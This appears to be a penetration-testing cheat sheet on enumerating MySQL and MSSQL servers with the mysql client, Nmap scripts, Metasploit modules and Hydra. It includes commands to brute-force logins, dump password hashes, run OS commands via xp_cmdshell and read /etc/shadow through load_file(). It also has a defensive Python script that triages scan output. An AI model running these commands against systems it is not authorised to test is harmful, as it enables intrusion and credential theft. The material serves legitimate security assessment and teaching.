# MySQL & MSSQL Enumeration

SQL (Structured Query Language) is a programming language used to manage and manipulate databases. It enables tasks like inserting, updating, querying, and deleting data. SQL databases use port 1433 (Microsoft SQL Server), 3306 (MySQL), and 5432 (PostgreSQL) for communication, allowing applications to interact with and retrieve information from structured data repositories.

## MySQL - Basic Enumeration

### Mysql command-line tool

The "mysql" command-line tool is used to access and manage MySQL databases, connecting to a server with specified credentials and options.

* **Connecting to a MySQL Database Server:** This command is used to connect to a MySQL database server hosted at the specified `<target>` IP address or hostname using the specified `<user>` username.

```bash
mysql -h <target> -u <user>
```

**Common MySQL Command-Line Commands:**

* **Select a Database:** Every statement is terminated with `;`. To switch the session to a particular database, use:

```sql
MySQL [(none)]> use <database>;
```

* **Count the Records in a Table:** Counts the number of records in the `authors` table.

```sql
MySQL [books]> select count(*) from authors;
```

* **Retrieve All Records from a Table:** Retrieves all records from the `authors` table.

```sql
MySQL [books]> select * from authors;
```

* **Attempt to Read a File:** Attempts to read the contents of `/etc/shadow` through `load_file()`. The call only succeeds when the connected account holds the `FILE` privilege and `secure_file_priv` does not confine reads to a directory, so a successful result indicates an over-privileged database account and a server that should have `secure_file_priv` set.

```sql
MySQL [(none)]> select load_file("/etc/shadow");
```

## MySQL & MSSQL: Nmap Enumeration Scripts

* **Gather Basic Information:** This command is used with Nmap to gather basic information about Microsoft SQL Server instances during network scanning.

```bash
nmap --script ms-sql-info <target>
```

* **Gather NTLM Authentication Information:** This command is employed with Nmap to gather NTLM authentication information from Microsoft SQL Server instances running on port 1443.

{% code overflow="wrap" %}

```bash
nmap --script ms-sql-ntlm-info --script-args mssql.instance-port=1443 192.168.1.10
```

{% endcode %}

* **Perform Brute-Force Attacks:** This command is used to perform brute-force attacks on Microsoft SQL Server instances using username and password lists located in the specified directory paths.

```bash
nmap --script ms-sql-brute --script-args userdb=<dir_path>,passdb=<dir_path> <target>
```

* **Detect Empty (Blank) Passwords:** This command is used with Nmap to detect Microsoft SQL Server instances with empty (blank) passwords.

```bash
nmap --script ms-sql-empty-password <target>
```

* **Execute SQL Queries:** This command is used with Nmap to execute a specific SQL query on a Microsoft SQL Server instance using provided credentials and save the output to `output.txt`.

{% code overflow="wrap" %}

```bash
nmap --script ms-sql-query --script-args mssql.username=<username>,mssql.password=<password>,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt <target>
```

{% endcode %}

* **Dump Password Hashes:** This command is used with Nmap to attempt dumping password hashes from a Microsoft SQL Server instance using provided credentials.

{% code overflow="wrap" %}

```bash
nmap --script ms-sql-dump-hashes --script-args mssql.username=<username>,mssql.password=<password> <target>
```

{% endcode %}

* **Execute Commands via `xp_cmdshell`:** This command is used with Nmap to execute the specified command (`ifconfig` in this case) using the `xp_cmdshell` extended stored procedure on a Microsoft SQL Server instance.

{% code overflow="wrap" %}

```bash
nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd="ifconfig" 192.168.1.10
```

{% endcode %}

* **Detect Empty (Blank) Passwords:** This command is used with Nmap to detect MySQL servers with empty (blank) passwords.

```bash
nmap --script mysql-empty-password <target>
```

* **Determine if MySQL Servers Provide Empty Password Information:** This command is used with Nmap to determine if MySQL servers provide empty (blank) password information.

```bash
nmap --script mysql-empty-info <target>
```

* **Identify MySQL Users:** This command is used with Nmap to identify MySQL users on the target server, attempting to authenticate using the username `root` and an empty password.

```bash
nmap --script mysql-users --script-args="mysqluser='root',mysqlpass=''" <target>
```

* **Enumerate MySQL Databases:** This command is used with Nmap to enumerate MySQL databases on the target server, trying to authenticate using the username `root` and an empty password.

```bash
nmap --script mysql-databases --script-args="mysqluser='root',mysqlpass=''" <target>
```

* **Retrieve MySQL Server Variables:** This command is used with Nmap to retrieve MySQL server variables from the target, attempting to authenticate with the username `root` and an empty password.

```bash
nmap --script mysql-variables --script-args="mysqluser='root',mysqlpass=''" <target>
```

* **Perform a Basic MySQL Security Audit:** This command is employed with Nmap to perform a basic MySQL security audit on the target server.

```bash
nmap --script mysql-audit --script-args="mysqluser='root',mysqlpass=''" <target>
```

* **Dump MySQL Password Hashes:** This command is used with Nmap to attempt dumping password hashes from a MySQL server using the username `root` and an empty password.

{% code overflow="wrap" %}

```bash
nmap --script mysql-dump-hashes --script-args="mysqluser='root',mysqlpass=''" <target>
```

{% endcode %}

* **Execute a Specific SQL Query:** This command is used with Nmap to execute a specific SQL query on a MySQL server, using the query `"select count(*) from books.authors;"`, and attempting authentication with the username `root` and an empty password.

{% code overflow="wrap" %}

```bash
nmap --script mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" <target>
```

{% endcode %}

* **Perform a MySQL Security Audit with a Specified Audit File:** This command is used with Nmap to perform a MySQL security audit using a specified audit file.

{% code overflow="wrap" %}

```bash
nmap --script mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" <target>
```

{% endcode %}
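The scripts above are easiest to act on when the scan is saved as XML (`-oX`) and triaged automatically. The following is an added example, not part of this page or of Nmap, that parses the XML produced by `mysql-empty-password`, `ms-sql-empty-password` and `mysql-variables` and flags blank-password accounts and an empty `secure_file_priv` (the setting that leaves `load_file()` unrestricted); the XML is a constructed sample in the shape Nmap writes, not real scan output.

```python
"""Triage nmap -oX output from the MySQL and MSSQL NSE scripts above."""
import xml.etree.ElementTree as ET

# Constructed sample in the shape nmap writes (newlines in script output
# are stored as &#xa; entities); not real scan data.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
 <host><address addr="192.0.2.10" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="3306">
   <script id="mysql-empty-password" output="&#xa;  root account has empty password"/>
   <script id="mysql-variables" output="&#xa;  secure_file_priv: &#xa;  local_infile: ON&#xa;  version: 8.0.33"/>
  </port>
  <port protocol="tcp" portid="1433">
   <script id="ms-sql-empty-password" output="&#xa;  sa:&lt;empty&gt; =&gt; Login Success"/>
  </port>
 </ports></host>
</nmaprun>"""

BLANK_PW_SCRIPTS = ("mysql-empty-password", "ms-sql-empty-password")

def parse_variables(output):
    """Turn the 'name: value' lines of mysql-variables output into a dict."""
    result = {}
    for line in output.splitlines():
        if ":" in line:
            name, _, value = line.strip().partition(":")
            result[name.strip()] = value.strip()
    return result

def triage(xml_text):
    """Return (address, port, finding) tuples a defender should act on."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            pid = port.get("portid")
            for script in port.iter("script"):
                sid, out = script.get("id"), script.get("output", "")
                if sid in BLANK_PW_SCRIPTS and ("empty password" in out or "Login Success" in out):
                    findings.append((addr, pid, f"{sid}: an account accepts a blank password"))
                elif sid == "mysql-variables":
                    v = parse_variables(out)
                    # An empty string (not NULL) means load_file() may read any readable path
                    if v.get("secure_file_priv") == "":
                        findings.append((addr, pid, "secure_file_priv is empty: load_file() is unrestricted"))
                    if v.get("local_infile", "").upper() == "ON":
                        findings.append((addr, pid, "local_infile is ON"))
    return findings

if __name__ == "__main__":
    for addr, port, msg in triage(SAMPLE_XML):
        print(f"{addr}:{port} {msg}")
```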

## MySQL & MSSQL: Metasploit Enumeration Scripts

* **Test SQL Server Logins:** In `msfconsole`, the command `use auxiliary/scanner/mssql/mssql_login` is used to perform login attempts on Microsoft SQL Server instances for credential testing during security assessments.

```bash
use auxiliary/scanner/mssql/mssql_login
```

* **Enumerate SQL Server Logins:** In `msfconsole`, the command `use auxiliary/admin/mssql/mssql_enum_sql_logins` is used to enumerate SQL Server logins on a Microsoft SQL Server instance during security assessments.

```bash
use auxiliary/admin/mssql/mssql_enum_sql_logins
```

* **Execute Arbitrary SQL Commands:** In `msfconsole`, the command `use auxiliary/admin/mssql/mssql_exec` is used to execute arbitrary SQL commands on a Microsoft SQL Server instance during security assessments.

```bash
use auxiliary/admin/mssql/mssql_exec
```

* **Enumerate Domain Accounts:** In `msfconsole`, the command `use auxiliary/admin/mssql/mssql_enum_domain_accounts` is used to enumerate domain accounts on a Microsoft SQL Server instance during security assessments.

```bash
use auxiliary/admin/mssql/mssql_enum_domain_accounts
```

* **Scan for Writable Directories:** In `msfconsole`, the command `use auxiliary/scanner/mysql/mysql_writable_dirs` is used to scan for MySQL databases with writable directories for security assessment.

```bash
use auxiliary/scanner/mysql/mysql_writable_dirs
```

* **Retrieve MySQL Password Hashes:** In `msfconsole`, the command `use auxiliary/scanner/mysql/mysql_hashdump` is used to retrieve password hashes from a MySQL database for security assessment.

```bash
use auxiliary/scanner/mysql/mysql_hashdump
```

## MySQL: Dictionary Attack

* In `msfconsole`, the command `use auxiliary/scanner/mysql/mysql_login` is used to perform login attempts on MySQL servers for credential testing during security assessments.

```bash
use auxiliary/scanner/mysql/mysql_login
```

* This command uses Hydra to perform a brute-force attack on a MySQL server located at the specified target. It attempts to guess the password for the `root` username using the `unix_passwords.txt` wordlist.

{% code overflow="wrap" %}

```bash
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <target> mysql
```

{% endcode %}

***

**Hacker's Mantra:** *Garbage can provide important details for hackers: names, telephone numbers, a company's internal jargon.* - Kevin Mitnick
